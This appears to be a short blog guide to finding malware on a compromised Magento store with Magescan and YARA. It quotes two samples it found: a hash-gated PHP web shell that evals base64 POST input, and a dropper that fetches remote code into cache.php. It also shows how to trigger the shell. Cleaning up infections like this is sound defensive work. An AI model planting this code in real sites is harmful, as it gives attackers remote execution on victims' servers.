The first thing to do is check your site from an outside perspective, as any other black hatter would do.
The Frontend scan
Use Magescan: ./magescan scan:all <site>
This scan will usually tell you what patches will be applied. First thing to do would be to patch them immediately.
Next thing is to check if there are any known modules that are vulnerable under Installed Modules. A classic problem extension is:
+------------------------+-----------+
| Module | Installed |
+------------------------+-----------+
| VladimirPopov_WebForms | Yes |
+------------------------+-----------+
This extension allows users to upload anything they want onto your server including files with the extension .php
So get rid of that thing as soon as you can.
A server side scan
Now time to scan for vulnerabilities and remote execution that are already a part of your magento site.
The best thing to use would be a Magento malware collection
The command to run is yara -r rules/all-confirmed.yar /path/to/directory
It will check against known MD5 hashes for files and for eval expressions:
eval_post My-site/magento/media/dhl/info.php
md5_c647e85ad77fd9971ba709a08566935d My-site/magento/media/wysiwyg/12345.php
The contents of info.php is:
$hash = 'fc5e038d38a57032085441e7fe7010b0';
if(isset($_POST['ue'])){
if (md5($_POST['hash']) === $hash) @eval(base64_decode($_POST['ue']));
exit;
}
if(isset($_GET['sesion'])){
phpinfo();
}
The contents of 12345.php is:
$cmd1 = file_get_contents("http://seotramp.com/wp-content/plugins/youtuber/cache.txt");
$fo = fopen("cache.php", "w+");
fwrite($fo, $cmd1);
fclose($fo);
I am not too sure about the second one, as that is more of a redirect hack that sends you and maybe your users to a Be Rich now if you use the Binary Options System
The first one is remote execution where you encode your code base64 and add a hash. I think they add all of these extra things just to confuse developers into thinking there is nothing going on here.
So to try it out we can make a post to: media/dhl/info.php
With
$_POST[‘ue’] = ZWNobyAnaGVsbG8gd29ybGQnOw==
and
$_POST[‘hash’] = helloworld
ZWNobyAnaGVsbG8gd29ybGQnOw==, base64 decoded is echo hello world;
So that is remote execution